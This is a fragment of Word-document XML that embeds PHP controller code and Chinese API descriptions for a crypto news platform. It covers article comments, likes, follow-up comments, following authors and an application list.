          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632202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评论资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD1C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4DE0A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E0F6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6F23F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5150E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评论内容（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282D7F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发表评论成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74823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发表评论失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AF4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9C58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8EB3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4288C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0EC2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23B35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6472C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2D40B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BAE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评论资讯文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3EA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E8D0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498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D7D0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595D8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tent == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BFDD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2A2F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评论内容不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61284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23A4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8A93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522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5D1C8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2AC1D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AC7D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3C4A2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356B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BA48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2713B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5CF7F4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2F7E0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11DA1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7C2B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empty($article)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A0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article_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD05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content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2056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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9F70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5B9F6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_uid'] = $article['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7AF3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id = Db::name('article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D25B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61067C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id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D4F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1605F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7CFC57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77BBB8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pingNum');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779373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评论您所发布的资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBA21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 '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A689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0E75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发表评论成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BBC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CF66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91B8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4557E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ED98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3A213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26F78C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C8D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3707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29F9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950D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发表评论失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D19AD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0D207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9E1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CD1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0C5D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_zan </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞｜取消点赞资讯文章评论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596EBD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资讯文章评论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085FF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65870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92892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7481ED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id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯文章评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376F7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4AC0AF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5D1AD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6A0226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6F7B25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624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zan()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6A5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9768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49D1C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6A5C31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DE4A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658C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资讯文章评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD4D6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233BE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6254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A26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id = input('param.ping_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048C9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id == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205BD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F5B8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76215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8502F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379C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7D7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 = Db::name('article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A87C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48C6D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0E4351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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4795E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Id'] = $ping_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6CF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zan = Db::name('article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37916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10F55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44BC6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_ping_zan)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0EE3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zan['zan'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784052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zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569AF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112473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3E81B2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10A14F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17623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2AD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199C5C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1E925C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zan');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE21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资讯评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F905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uid'], $content, '', $ping['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F98B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10A6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17B16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0C5E4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4EB3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1548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zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C76F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3AFC6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0ADC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259AD4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3FD316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0F98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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11666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201107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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4862F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评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F69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uid'], $content, '', $ping['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483075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6088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0FCAC6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712F8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71DC8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A13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FE89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09981C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2B76DF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zan_id = Db::name('article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5F7D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0C59D7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zan_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBFF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A85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6C3FA8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6125B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评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7B01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uid'], $content, '', $ping['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF8D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1973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014E9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4016C8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06E6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C4F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434C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7D50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223C4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文章评论不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4123B9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129E9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80DA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50C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6FB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D43B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6A4C7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22C90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AFE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2A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555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_xia </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F62A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追评资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F56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0E7D77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E574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7477E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376AC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id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯文章评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178FD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追评内容（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053D5E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追评成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E59D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追评失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78484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703F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1FF3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xia()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACBB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90A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D009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7A7DE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AD59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E765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请先登录账号，然后追评资讯文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEDA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49EC7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46C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75E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA67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tent == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0460C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03CE0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追评内容不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8A1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EFF5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5F2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4E8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42722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2FEE81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BEC5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642476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5D27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4A3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5A98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643C0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6EEBA5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6143B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DEC6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70F59D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id = input('param.ping_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A7E9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id == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A94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F158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9350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26DDA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56A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67A5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 = Db::name('article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED62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382C9D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2A03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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78096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article_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC27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id'] = $ping_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A711D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content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10789B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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEA4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1FBAE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uid'] = $ping['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F548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xia_id = Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D916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4B36B8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xia_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4D92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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F34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583D9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4CE53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pingNum');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10094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追评您所发布的资讯评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E616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uid'], $content, '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A943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22F41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 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户追评成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F17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A28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D85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2389B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A01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评论不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59474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1FB44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582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D66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E0A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5A16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4E6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26FD8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67D26C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9B9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12B7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138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6D57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追评失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75847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7508D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508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F9C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7C7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ping_xia_zan </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞｜取消点赞资讯文章追评</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6210D3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资讯文章追评</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A927A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20778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3BC6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0DE8D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xia_id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯文章追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38370A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32881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2A29E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2501A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BFFA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C59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xia_zan()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B54C5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1B9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2FD24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645BB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E2D0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F6C35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资讯文章追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455BE4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164CA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A6AA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E819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_id = input('param.ping_xia_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79313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xia_id == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAC1A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8793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追评</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E5823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6627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8DD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BB9C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ing_xia = Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71780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250833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6BBA9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_xia)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2850BE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Id'] = $ping_xia_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C999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xia_zan = Db::name('article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC05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4DCCEA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95E49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_ping_xia_zan)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413EB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xia_zan['zan'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E339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_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD51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556A0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5EB172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587A4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663F9C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574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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC8B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5E4D3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zan');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53548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资讯追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFE6E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uid'], $content, '', $ping_xia['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EDA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55F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4A49E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0FEAA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C9CC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3BD8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_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1AD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3883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7B2D45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12E0F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gt; time(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADB5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375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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6329F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5BC9C7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6700C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追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F33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uid'], $content, '', $ping_xia['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ADA3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6A2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3ECCDC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542BB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0B3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864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C84E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226691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53E063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ping_xia_zan_id = Db::name('article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626197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550B3A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ping_xia_zan_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD5AB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62203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id', $ping_xia_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0817CE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145D8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资讯追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63340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uid'], $content, '', $ping_xia['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F312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C73C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0046D4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3864F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B7B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9F9C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4C2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7558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641B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文章追评不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632E7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0841CF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BC9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B58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863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ABAD2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7C39F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5656AA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CDD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EBDC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72B7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article/follow_author </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关注｜取消关注资讯文章作者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50030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关注｜取消关注资讯文章作者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2068A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资讯</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6A6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E500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2F4B3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必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F25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关注文章作者成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33522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关注；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已取消关注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EA49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关注文章作者失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44133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2F6A9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6B6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_author()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8B77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66F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C880C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0A649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124C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E17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关注资讯文章作者</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F6D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CA53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BCA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A2B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226751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70A85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ACF0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资讯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79A1BB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C9AA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110F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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8912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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8C0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2DE787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hide', 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2640B1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ADFE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1B88CC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z_uid'] = $article['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A06D3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 = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E20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54213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8DC4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_guanzhu)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5507D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guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ECB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1B7FF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delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16959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关注您</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F11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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4E0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ED694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关注文章作者成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FF9F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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A41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92E1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EE6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163D9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_id = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D06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21123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guanzhu_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ECD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关注您</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6BA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uid'], $content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204F5C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F955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关注文章作者成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4072F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15BBF9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6F6E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F8DF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AD53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A68F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8794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资讯文章不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD70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28721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566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9CC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57EC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0EC6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关注文章作者失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD40E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6145B0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83E8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853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57F95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6AA02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1E29A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0167B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3989AB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ccxt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718778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class Platform extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751A0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28D5A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CC7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56CD6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0A39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435071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0D2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2A71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A86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6B198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FA9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453101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266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7C5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platform/lists </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDF09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应用列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007110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应用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA5B8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CB0DE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8511A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Use MyPages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5F6E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kind </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用分类（包括：交易所、资讯、挖矿）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2BA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应用列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5880F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id </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B4FD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name </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D9B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logo </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>logo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F51C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details </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用简介</w:t>
      </w:r>
    </w:p>
